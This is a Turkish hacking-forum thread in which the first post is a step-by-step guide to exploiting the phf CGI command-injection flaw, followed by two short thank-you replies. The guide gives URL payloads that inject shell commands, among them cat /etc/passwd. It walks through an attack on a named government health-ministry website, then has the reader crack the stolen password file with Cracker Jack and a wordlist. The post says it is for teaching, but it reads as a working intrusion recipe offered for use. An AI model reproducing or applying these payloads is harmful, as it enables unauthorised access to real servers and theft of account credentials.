Konuyu Oyla:
  • Toplam: 3 Oy - Ortalama: 3.67
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Web Site Hacking
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 121
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Web Site Hacking
22.01.2014 17:15
Selamlar... Bu yazida daha basit ama daha hizli bir hack yontemini anlatcamBu yontem cok hosunuza gidecek Smile
Gerekli Programlar :
Internet Explorer haricinde bir web browser, Cracker Jack ve tabiki Meliksah Ozoral's Dict Maker.
--------------------------------------
Mantik : phf sistemlerde bulunan bir acikdir ve bu acik sayesinde sisteme web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini phf uzerinden yapamiyorsunuz...
--------------------------------------

Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve kirabilirsiniz...Bu olay web uzerinden
olur ve hizli olur |Smile~ eNJOy!
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu asagidaki satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar...
/cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlarsistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki dosyalar
goruntulenir.../cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde pass ile baslayan butun dosyalari listeler...
Komutun Kullanimi Kolay!
Simdi Biraz Ornek Cozelim!
--------------------------------------
Evet bu ornek kesinlikle ogretim amacli cozulmusdur herhangi bir art niyetim
yok |;)~
Hedef : T.C. Saglik Bakanligi
Gerekli Bilgiler : Sadece web sayfalarinin
adresi : http://www.saglik.gov.tr
Browser inizi calistirin...
Adres olarak http://www.saglik.gov.tr yazin.Evet sayfa geldi simdi bakalim phf acigi var mi ?
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0als yazin! tamam dosya listesi karsimiza geldigine gore phf olayi isliyor...
Simdi passwd dosyasini alalim...cat /etc/passwd komutu ile... bu nu phf ile asagidaki gibi yaziliyor... http://www.saglik.gov.tr/cgi-bin/phf?Qal...etc/passwd
tamam Ok dir password dosyasini gordunuz! bunu simdi cut/copy/paste ile bir dosyaya saklayin...Internet baglantisini kesin ve dos moduna gecin...
Sakladiginiz dosyayi Cracker Jack adli programin bulundugu dizine kopyalayin.

Eger daha onceden hazirladiginiz bir wordlist varsa Cracker Jack ile "passwd" dosyasini kirmaya baslayin yoksa once Meliksah Ozoral's Dict Maker v1.0 ile bir wordlist hazirlayin... Cracker Jack passwd dosyasindaki acclari kirmaya baslar...
Bu islem gunlerce surer ve kirdigi acclari kullanabilirsiniz...

Alıntı Exciting
(Bu konu en son: 22.01.2014 Tarihinde, Saat: 18:57 düzenlenmiştir. Düzenleyen: DaRKNeSS.)
Alinti
Hacker Peyami
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 27
Yaşam Puanı: 325 / 664
Deneyim: 56 / 100
Rep Sayısı: 61
Mesaj Sayısı: 963
Üyelik Tarihi: 18.06.2013
      
Yorum: #2
Cvp: Web Site Hacking
22.01.2014 17:47
eline sağlık tuncay Smile

Gölgede Yaşayanlar,Güneşi Göremezler...
Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı:
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #3
Cvp: Web Site Hacking
22.01.2014 22:18
rica ederim


Alinti



1 Ziyaretçi